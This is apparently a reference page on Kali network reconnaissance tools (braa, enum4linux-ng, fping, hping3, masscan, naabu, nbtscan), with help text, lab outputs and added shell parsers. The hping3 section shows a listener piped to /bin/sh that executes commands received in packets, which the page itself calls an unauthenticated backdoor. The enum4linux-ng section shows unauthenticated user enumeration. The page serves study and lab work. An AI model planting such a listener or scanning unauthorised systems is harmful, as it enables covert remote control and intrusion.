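#        public@192.168.11.3-192.168.11.4:.1.3.6.1.2.1.25.2.3.1.5.1/hrStorageSize > braa.out

# Constructed sample of braa output (label:ip:rtt:index:value); not a real capture.
# sysDescr lines are included on purpose: their values contain ':' and must not break parsing.
SAMPLE_BRAA='sysDescr:192.168.11.3:21ms:.0:Hardware: Intel64 Family 6 Model 142 Stepping 11 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 22635 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.3:21ms:.1:4096
hrStorageSize:192.168.11.3:21ms:.1:62190335
sysDescr:192.168.11.4:21ms:.0:Hardware: AMD64 Family 23 Model 17 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 19045 Multiprocessor Free)
hrStorageAllocationUnits:192.168.11.4:21ms:.1:4096
hrStorageSize:192.168.11.4:21ms:.1:121528319'

# stdin: braa output. stdout: "ip bytes GiB" for every host that answered both queries.
braa_storage_bytes() {
    awk -F: '
        # Rebuild the value from field 5 onward so colons inside a value survive the split.
        { v = $5; for (i = 6; i <= NF; i++) v = v ":" $i }
        $1 == "hrStorageAllocationUnits" { units[$2] = v }
        $1 == "hrStorageSize"            { size[$2]  = v }
        END {
            # Only hosts with both answers; size in blocks * bytes per block.
            for (ip in size)
                if (ip in units)
                    printf "%s %.0f %.1f\n", ip, size[ip] * units[ip],
                           size[ip] * units[ip] / 1073741824
        }' | sort
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_BRAA" | braa_storage_bytes
```

Hosts that answered only one of the two queries (a timeout on a busy agent is common at braa's default pacing) are dropped rather than reported with a bogus size; rerun those with a longer `-t`.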
enum4linux-ng
Collects information about a machine over file-sharing protocols (mainly SMB, via RPC calls; LDAP is also queried on domain controllers). In the output, the dialect section deserves a look: "SMB signing required: false" means the server accepts unsigned sessions, and "SMB1 only: true" marks a legacy server that only speaks the oldest dialect.
■ Usage
root@kali:~# enum4linux-ng --help
usage: enum4linux-ng [-h] [-A] [-As] [-U] [-G] [-Gm] [-S] [-C] [-P] [-O] [-L] [-I] [-R [BULK_SIZE]] [-N] [-w DOMAIN] [-u USER]
[-p PW | -K TICKET_FILE | -H NTHASH] [--local-auth] [-d] [-k USERS] [-r RANGES] [-s SHARES_FILE] [-t TIMEOUT] [-v] [--keep]
[-oJ OUT_JSON_FILE | -oY OUT_YAML_FILE | -oA OUT_FILE]
host
[...]
positional arguments:
host
options:
-h, --help show this help message and exit
-A Do all simple enumeration including nmblookup (-U -G -S -P -O -N -I -L). This option is enabled if you don't provide any other option.
-As Do all simple short enumeration without NetBIOS names lookup (-U -G -S -P -O -I -L)
-U Get users via RPC
-G Get groups via RPC
-Gm Get groups with group members via RPC
-S Get shares via RPC
-C Get services via RPC
-P Get password policy information via RPC
-O Get OS information via RPC
-L Get additional domain info via LDAP/LDAPS (for DCs only)
-I Get printer information via RPC
-R [BULK_SIZE] Enumerate users via RID cycling. Optionally, specifies lookup request size.
-N Do an NetBIOS names lookup (similar to nbtstat) and try to retrieve workgroup from output
-w DOMAIN Specify workgroup/domain manually (usually found automatically)
-u USER Specify username to use (default "")
-p PW Specify password to use (default "")
-K TICKET_FILE Try to authenticate with Kerberos, only useful in Active Directory environment
-H NTHASH Try to authenticate with hash
--local-auth Authenticate locally to target
-d Get detailed information for users and groups, applies to -U, -G and -R
-k USERS User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none). Used to get sid with "lookupsids"
-r RANGES RID ranges to enumerate (default: 500-550,1000-1050)
-s SHARES_FILE Brute force guessing for shares
-t TIMEOUT Sets connection timeout in seconds (default: 5s)
-v Verbose, show full samba tools commands being run (net, rpcclient, etc.)
--keep Don't delete the Samba configuration file created during tool run after enumeration (useful with -v)
-oJ OUT_JSON_FILE Writes output to JSON file (extension is added automatically)
-oY OUT_YAML_FILE Writes output to YAML file (extension is added automatically)
-oA OUT_FILE Writes output to YAML and JSON file (extensions are added automatically)
■ Example
root@kali:~# enum4linux-ng 192.168.11.4
ENUM4LINUX - next generation (v1.3.4)
[...]
===================================
| Listener Scan on 192.168.11.4 |
===================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
[...]
=======================================
| SMB Dialect Check on 192.168.11.4 |
=======================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
[...]
=============================================
| OS Information via RPC for 192.168.11.4 |
=============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT f4f5ef5b7e57 server (Samba 3.0.20-Debian)
===================================
| Users via RPC on 192.168.11.4 |
===================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
username: root
name: root
acb: '0x00000011'
description: (null)
'1002':
username: daemon
name: daemon
acb: '0x00000011'
description: (null)
[...]
fping
Sends ICMP echo requests to any number of targets in parallel, so a sweep of a whole range finishes far faster than looping over ping.
■ Usage
root@kali:~# fping --help
Usage: fping [options] [targets...]
Probing options:
-4, --ipv4 only ping IPv4 addresses
-6, --ipv6 only ping IPv6 addresses
-b, --size=BYTES amount of ping data to send, in bytes (default: 56)
-B, --backoff=N set exponential backoff factor to N (default: 1.5)
-c, --count=N count mode: send N pings to each target
-f, --file=FILE read list of targets from a file ( - means stdin)
-g, --generate generate target list (only if no -f specified)
(give start and end IP in the target list, or a CIDR address)
(ex. fping -g 192.168.1.0 192.168.1.255 or fping -g 192.168.1.0/24)
-H, --ttl=N set the IP TTL value (Time To Live hops)
-I, --iface=IFACE bind to a particular interface
-l, --loop loop mode: send pings forever
-m, --all use all IPs of provided hostnames (e.g. IPv4 and IPv6), use with -A
-M, --dontfrag set the Don't Fragment flag
-O, --tos=N set the type of service (tos) flag on the ICMP packets
-p, --period=MSEC interval between ping packets to one target (in ms)
(in loop and count modes, default: 1000 ms)
-r, --retry=N number of retries (default: 3)
-R, --random random packet data (to foil link data compression)
-S, --src=IP set source address
-t, --timeout=MSEC individual target initial timeout (default: 500 ms,
except with -l/-c/-C, where it's the -p period up to 2000 ms)
Output options:
-a, --alive show targets that are alive
-A, --addr show targets by address
-C, --vcount=N same as -c, report results in verbose format
-d, --rdns show targets by name (force reverse-DNS lookup)
-D, --timestamp print timestamp before each output line
-e, --elapsed show elapsed time on return packets
-i, --interval=MSEC interval between sending ping packets (default: 10 ms)
-n, --name show targets by name (reverse-DNS lookup for target IPs)
-N, --netdata output compatible for netdata (-l -Q are required)
-o, --outage show the accumulated outage time (lost packets * packet interval)
-q, --quiet quiet (don't show per-target/per-ping results)
-Q, --squiet=SECS same as -q, but add interval summary every SECS seconds
-s, --stats print final stats
-u, --unreach show targets that are unreachable
-v, --version show version
-x, --reachable=N shows if >=N hosts are reachable or not
■ Example
root@kali:~# fping -g 192.168.11.0/24
192.168.11.1 is alive
192.168.11.3 is alive
192.168.11.4 is alive
hping3
Sends custom ICMP/UDP/TCP packets and displays the target's replies. Besides probing, it has a listen mode that prints everything after a chosen signature string in any packet it sees, and a Tcl scripting interface for crafting packets.
■ Usage
root@kali:~# hping3 --help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don't fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-mss enable the TCP MSS option with the given value
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)
■ Example
# Reachability check with an ACK probe to port 80 (useful when a firewall blocks ICMP); an RST reply means the host is up and the port is not filtered
root@kali:~# hping3 -c 3 -A -p 80 192.168.11.4
HPING 192.168.11.4 (eth0 192.168.11.4): A set, 40 headers + 0 data bytes
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=0 win=0 rtt=16.2 ms
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=1 win=0 rtt=16.0 ms
len=40 ip=192.168.11.4 ttl=64 DF id=0 sport=80 flags=R seq=2 win=0 rtt=15.4 ms
--- 192.168.11.4 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 15.4/15.9/16.2 ms
------------------------------
# Sniff packets in listen mode, keyed on the signature string HTTP
root@kali:~# hping3 --listen HTTP --interface eth0
hping3 listen mode
# Send an HTTP request
root@kali:~# curl http://192.168.11.4
# Everything following the string HTTP in the sent and received data is printed
root@kali:~# hping3 --listen HTTP --interface eth0
hping3 listen mode
/1.1
Host: 192.168.11.4
User-Agent: curl/8.9.1
Accept: */*
/1.1 200 OK
Date: Mon, 14 Oct 2024 11:28:04 GMT
Server: Apache/2.4.62 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html
<html><body><h1>It works!</h1></body></html>
------------------------------
# [host 1] listen mode, piped to a shell: whatever follows the signature "hello" in any received packet is executed. Nothing authenticates the sender, so this is an unauthenticated backdoor; treat it as a demo of a covert channel, not a tool to leave running.
root@kali_1:~# hping3 --listen hello --interface eth0 | /bin/sh
hping3 listen mode
root@kali_2:~# echo ls > test.cmd
# [host 2] send the file contents as packet data to port 53 on host 1, prefixed with the signature
root@kali_2:~# hping3 192.168.11.3 -c 1 -p 53 -d 100 --sign hello --file test.cmd
HPING 192.168.11.3 (eth0 192.168.11.3): NO FLAGS are set, 40 headers + 100 data bytes
len=40 ip=192.168.11.3 ttl=64 DF id=0 sport=53 flags=RA seq=0 win=0 rtt=7.1 ms
--- 192.168.11.3 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 7.1/7.1/7.1 ms
# [host 1] the received data is executed as a command (here ls)
root@kali_1:~# hping3 --listen hello --interface eth0 | /bin/sh
hping3 listen mode
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
------------------------------
# Write a Tcl script that sends a SYN packet to port 80 on the target
root@kali_1:~# vi example.htcl
set target 192.168.11.4
set myaddr 192.168.11.3
set syn {}
append syn "ip(saddr=$myaddr,daddr=$target,ttl=255)"
append syn "+tcp(sport=123,dport=80,flags=s)"
hping send $syn
# Run the script; tcpdump on the target (host 2) shows the SYN and the RST it answers with
root@kali_1:~# hping3 exec example.htcl
root@kali_2:~# tcpdump -n -i eth0
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:46:06.373816 IP 192.168.11.3.123 > 192.168.11.4.80: Flags [S], seq 0, win 0, length 0
13:46:06.373844 IP 192.168.11.4.80 > 192.168.11.3.123: Flags [R.], seq 0, ack 1, win 0, length 0
MASSCAN
Scans ports on a large number of hosts at high speed. It is stateless (it does not track connections, so retries go out regardless of replies and duplicates in the output are normal) and transmits at whatever --rate you ask for, so set the rate deliberately on shared networks.
■ Usage
root@kali:~# man masscan
SYNOPSIS
masscan <ip addresses/ranges> -p ports options
OPTIONS
• <ip/range>: anything on the command-line not prefixed with a '-' is assumed to be an IP address or range. There are three valid formats. The first is a single IPv4 address like "192.168.0.1". The second is a range like "10.0.0.1-10.0.0.100". The third is a CIDR address, like "0.0.0.0/0". At least one target must be specified. Multiple targets can be specified. This can be specified as multiple options separated by space, or can be separated by a comma as a single option, such as 10.0.0.0/8,192.168.0.1.
• --range <ip/range>: the same as target range spec described above, except as a named parameter instead of an unnamed one.
• -p <ports>, --ports <ports>: specifies the port(s) to be scanned. A single port can be specified, like -p80. A range of ports can be specified, like -p 20-25. A list of ports/ranges can be specified, like -p80,20-25. UDP ports can also be specified, like --ports U:161,U:1024-1100.
• --banners: specifies that banners should be grabbed, like HTTP server versions, HTML title fields, and so forth. Only a few protocols are supported.
• --rate <packets-per-second>: specifies the desired rate for transmitting packets. This can be very small numbers, like 0.1 for transmitting packets at rates of one every 10 seconds, or very large numbers like 10000000, which attempts to transmit at 10 million packets/second. In my experience, Windows can do 250 thousand packets per second, and latest versions of Linux can do 2.5 million packets per second. The PF_RING driver is needed to get to 25 million packets/second.
• -c <filename>, --conf <filename>: reads in a configuration file. The format of the configuration file is described below.
• --resume <filename>: the same as --conf, except that a few options are automatically set, such as --append-output. The format of the configuration file is described below.
• --echo: don't run, but instead dump the current configuration to a file. This file can then be used with the -c option. The format of this output is described below under 'CONFIGURATION FILE'.
• -e <ifname>, --adapter <ifname>: use the named raw network interface, such as "eth0" or "dna1". If not specified, the first network interface found with a default gateway will be used.
• --adapter-ip <ip-address>: send packets using this IP address. If not specified, then the first IP address bound to the network interface will be used. Instead of a single IP address, a range may be specified. NOTE: The size of the range must be an even power of 2, such as 1, 2, 4, 8, 16, 1024 etc. addresses.
• --adapter-port <port>: send packets using this port number as the source. If not specified, a random port will be chosen in the range 40000 through 60000. This port should be filtered by the host firewall (like iptables) to prevent the host network stack from interfering with arriving packets. Instead of a single port, a range can be specified, like 40000-40003. NOTE: The size of the range must be an even power of 2, such as the example above that has a total of 4 addresses.
• --adapter-mac <mac-address>: send packets using this as the source MAC address. If not specified, then the first MAC address bound to the network interface will be used.
• --router-mac <mac address>: send packets to this MAC address as the destination. If not specified, then the gateway address of the network interface will be ARPed.
• --ping: indicates that the scan should include an ICMP echo request. This may be included with TCP and UDP scanning.
• --exclude <ip/range>: blacklist an IP address or range, preventing it from being scanned. This overrides any target specification, guaranteeing that this address/range won't be scanned. This has the same format as the normal target specification.
• --excludefile <filename>: reads in a list of exclude ranges, in the same target format described above. These ranges override any targets, preventing them from being scanned.
• --append-output: causes output to append to file, rather than overwriting the file.
• --iflist: list the available network interfaces, and then exits.
• --retries: the number of retries to send, at 1 second intervals. Note that since this scanner is stateless, retries are sent regardless of whether replies have already been received.
• --nmap: print help about nmap-compatibility alternatives for these options.
• --pcap-payloads: read packets from a libpcap file containing packets and extract the UDP payloads, and associate those payloads with the destination port. These payloads will then be used when sending UDP packets with the matching destination port. Only one payload will be remembered per port. Similar to --nmap-payloads.
• --nmap-payloads <filename>: read in a file in the same format as the nmap file nmap-payloads. This contains UDP payloads, so that we can send useful UDP packets instead of empty ones. Similar to --pcap-payloads.
• --http-user-agent <user-agent>: replaces the existing user-agent field with the indicated value when doing HTTP requests.
• --open-only: report only open ports, not closed ports.
• --pcap <filename>: saves received packets (but not transmitted packets) to the libpcap-format file.
• --packet-trace: prints a summary of those packets sent and received. This is useful at low rates, like a few packets per second, but will overwhelm the terminal at high rates.
• --pfring: force the use of the PF_RING driver. The program will exit if PF_RING DNA drivers are not available.
• --resume-index: the point in the scan at which it was paused.
• --resume-count: the maximum number of probes to send before exiting. This is useful with the --resume-index to chop up a scan and split it among multiple instances, though the --shards option might be better.
• --shards <x>/<y>: splits the scan among instances. x is the id for this scan, while y is the total number of instances. For example, --shards 1/2 tells an instance to send every other packet, starting with index 0. Likewise, --shards 2/2 sends every other packet, but starting with index 1, so that it doesn't overlap with the first example.
• --rotate <time>: rotates the output file, renaming it with the current timestamp, moving it to a separate directory. The time is specified in number of seconds, like "3600" for an hour. Or, units of time can be specified, such as "hourly", or "6hours", or "10min". Times are aligned on an even boundary, so if "daily" is specified, then the file will be rotated every day at midnight.
• --rotate-offset <time>: an offset in the time. This is to accommodate timezones.
• --rotate-dir <directory>: when rotating the file, this specifies which directory to move the file to. A useful directory is /var/log/masscan.
• --seed <integer>: an integer that seeds the random number generator. Using a different seed will cause packets to be sent in a different random order. Instead of an integer, the string time can be specified, which seeds using the local timestamp, automatically generating a different random order of scans. If no seed is specified, time is the default.
• --regress: run a regression test, returns '0' on success and '1' on failure.
• --ttl <num>: specifies the TTL of outgoing packets, defaults to 255.
• --wait <seconds>: specifies the number of seconds after transmit is done to wait for receiving packets before exiting the program. The default is 10 seconds. The string forever can be specified to never terminate.
• --offline: don't actually transmit packets. This is useful with a low rate and --packet-trace to look at what packets might've been transmitted. Or, it's useful with --rate 100000000 in order to benchmark how fast transmit would work (assuming a zero-overhead driver). PF_RING is about 20% slower than the benchmark result from offline mode.
• -sL: this doesn't do a scan, but instead creates a list of random addresses. This is useful for importing into other tools. The options --shard, --resume-index, and --resume-count can be useful with this feature.
• --interactive: show the results in realtime on the console. It has no effect if used with --output-format or --output-filename.
• --output-format <fmt>: indicates the format of the output file, which can be xml, binary, grepable, list, or JSON. The option --output-filename must be specified.
• --output-filename <filename>: the file which to save results to. If the parameter --output-format is not specified, then the default of xml will be used.
• -oB <filename>: sets the output format to binary and saves the output in the given filename. This is equivalent to using the --output-format and --output-filename parameters. The option --readscan can then be used to read the binary file. Binary files are much smaller than their XML equivalents, but require a separate step to convert back into XML or another readable format.
• -oX <filename>: sets the output format to XML and saves the output in the given filename. This is equivalent to using the --output-format xml and --output-filename parameters.
• -oG <filename>: sets the output format to grepable and saves the output in the given filename. This is equivalent to using the --output-format grepable and --output-filename parameters.
• -oJ <filename>: sets the output format to JSON and saves the output in the given filename. This is equivalent to using the --output-format json and --output-filename parameters.
• -oL <filename>: sets the output format to a simple list format and saves the output in the given filename. This is equivalent to using the --output-format list and --output-filename parameters.
• --readscan <binary-files>: reads the files created by the -oB option from a scan, then outputs them in one of the other formats, depending on command-line parameters. In other words, it can take the binary version of the output and convert it to an XML or JSON format.
■ Example
root@kali:~# masscan 192.168.11.0/24 -p 20-25
Starting masscan 1.3.9-integration (http://bit.ly/14GZzcT) at 2024-12-10 02:30:09 GMT
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 21/tcp on 192.168.11.4
Discovered open port 25/tcp on 192.168.11.4
Discovered open port 23/tcp on 192.168.11.4
Discovered open port 22/tcp on 192.168.11.4
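masscan finds open ports quickly but identifies nothing behind them, so the usual next step is to hand exactly those ports to nmap's version detection. The following is an added example (not code from the original page or the masscan project) that parses masscan's list output (`-oL`, described in the man page above), collapses it into one sorted, deduplicated port list per host and runs nmap -sV on just those ports. The sample input is constructed, not a real capture; the command that would produce it (`masscan 192.168.11.0/24 -p 1-65535 --rate 1000 -oL scan.lst`) is an assumed workflow.

```shell
#!/bin/sh
# Added example (not from the original page or masscan): masscan -oL -> per-host port list -> nmap -sV.
# Assumed producer (run separately, needs a network and root):
#   masscan 192.168.11.0/24 -p 1-65535 --rate 1000 -oL scan.lst

# Constructed sample of -oL output ("state proto port ip timestamp"); not a real capture.
# The repeated port 21 line imitates what --retries yields on a stateless scanner.
SAMPLE_MASSCAN='#masscan
open tcp 21 192.168.11.4 1733797809
open tcp 25 192.168.11.4 1733797809
open tcp 23 192.168.11.4 1733797809
open tcp 22 192.168.11.4 1733797809
open tcp 21 192.168.11.4 1733797812
open tcp 22 192.168.11.3 1733797810
# end'

# stdin: masscan -oL output. stdout: "ip port,port,..." per host, ports sorted and deduplicated.
masscan_to_targets() {
    awk '$1 == "open" && $2 == "tcp" { print $4, $3 }' \
      | sort -u -k1,1 -k2,2n \
      | awk '
          $1 != ip { if (ip != "") print ip, ports; ip = $1; ports = $2; next }
          { ports = ports "," $2 }
          END { if (ip != "") print ip, ports }'
}

# Version-scan each host on exactly the ports masscan reported open.
# -Pn: masscan already proved the host answers, so skip nmap's own host discovery.
masscan_followup() {
    masscan_to_targets | while read -r ip ports; do
        nmap -sV -Pn -p "$ports" "$ip"
    done
}

# Stand-alone demo of the parsing step (masscan_followup needs nmap and a live network).
printf '%s\n' "$SAMPLE_MASSCAN" | masscan_to_targets
```

Usage: `masscan_followup < scan.lst`. Only `open tcp` lines are kept; UDP results and `banner` lines from --banners are ignored here, so extend the first awk filter if you scan UDP ports.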
Naabu
Runs SYN/CONNECT/UDP port scans quickly against a host or a list of hosts and lists the ports that respond. SYN scans need raw-socket privileges (CAP_NET_RAW); without them naabu falls back to CONNECT scans.
■ Usage
root@kali:~# naabu --help
Naabu is a port scanning tool written in Go that allows you to enumerate open ports for hosts in a fast and reliable manner.
Usage:
naabu [flags]
Flags:
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-config string path to the naabu configuration file (default $HOME/.config/naabu/config.yaml)
-scan-all-ips, -sa scan all the IPs associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4) (default ["4"])
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy - might not work on OSX)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port]
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
SERVICES-DISCOVERY:
-sD, -service-discovery Service Discovery
-sV, -service-version Service Version
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose naabu metrics on (default 63636)
■ Example
root@kali:~# naabu -host 192.168.11.4
[INF] Current naabu version 2.3.1 (latest)
[INF] Running host discovery scan
[INF] Running SYN scan with CAP_NET_RAW privileges
192.168.11.4:5900
192.168.11.4:111
192.168.11.4:80
192.168.11.4:514
192.168.11.4:2121
192.168.11.4:445
192.168.11.4:25
192.168.11.4:23
192.168.11.4:513
192.168.11.4:21
192.168.11.4:3306
192.168.11.4:6000
192.168.11.4:8009
192.168.11.4:22
192.168.11.4:139
192.168.11.4:5432
[INF] Found 16 ports on host 192.168.11.4 (192.168.11.4)
# Run service detection against the open ports by piping naabu's host:port lines into fingerprintx
root@kali:~# naabu -host 192.168.11.4 -silent | fingerprintx -f
mysql://192.168.11.4:3306
smtp://192.168.11.4:25
ssh://192.168.11.4:22
ftp://192.168.11.4:21
postgresql://192.168.11.4:5432
vnc://192.168.11.4:5900
rpc://192.168.11.4:111
telnet://192.168.11.4:23
http://192.168.11.4:80
NBTscan
Scans a network for NetBIOS name service responders and displays the NetBIOS names, suffix codes and MAC addresses it gets back.
■ Usage
root@kali:~# nbtscan
Usage:
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|(<scan_range>)
-v verbose output. Print all names received
from each host
-d dump packets. Print whole packet contents.
-e Format output in /etc/hosts format.
-l Format output in lmhosts format.
Cannot be used with -v, -s or -h options.
-t timeout wait timeout milliseconds for response.
Default 1000.
-b bandwidth Output throttling. Slow down output
so that it uses no more than bandwidth bps.
Useful on slow links, so that outgoing queries
don't get dropped.
-r use local port 137 for scans. Win95 boxes
respond to this only.
You need to be root to use this option on Unix.
-q Suppress banners and error messages,
-s separator Script-friendly output. Don't print
column and record headers, separate fields with separator.
-h Print human-readable names for services.
Can only be used with -v option.
-m retransmits Number of retransmits. Default 0.
-f filename Take IP addresses to scan from file filename.
-f - makes nbtscan take IP addresses from stdin.
<scan_range> what to scan. Can either be single IP
like 192.168.1.1 or
range of addresses in one of two forms:
xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx.
■ Example (with -v each name record is printed raw as name:suffix and type, U = unique, G = group; compare the decoded form in the nbtscan-unixwiz output below)
root@kali:~# nbtscan -v -s : 192.168.11.4
192.168.11.4:600E54EA9E5E :00U
192.168.11.4:600E54EA9E5E :03U
192.168.11.4:600E54EA9E5E :20U
192.168.11.4:600E54EA9E5E :00U
192.168.11.4:600E54EA9E5E :03U
192.168.11.4:600E54EA9E5E :20U
192.168.11.4:__MSBROWSE__:01G
192.168.11.4:WORKGROUP :00G
192.168.11.4:WORKGROUP :1dU
192.168.11.4:WORKGROUP :1eG
192.168.11.4:WORKGROUP :00G
192.168.11.4:WORKGROUP :1dU
192.168.11.4:WORKGROUP :1eG
192.168.11.4:MAC:dc:fb:48:75:75:0b
nbtscan(unixwiz)
Another NetBIOS name scanner (the unixwiz implementation); with -f it decodes the suffix codes into service names, so its output is easier to read than the raw codes from nbtscan.
■ Usage
root@kali:~# nbtscan-unixwiz
usage: nbtscan-unixwiz [options] target [targets...]
Targets are lists of IP addresses, DNS names, or address
ranges. Ranges can be in /nbits notation ("192.168.12.0/24")
or with a range in the last octet ("192.168.12.64-97")
-V show Version information
-f show Full NBT resource record responses (recommended)
-H generate HTTP headers
-v turn on more Verbose debugging
-n No looking up inverse names of IP addresses responding
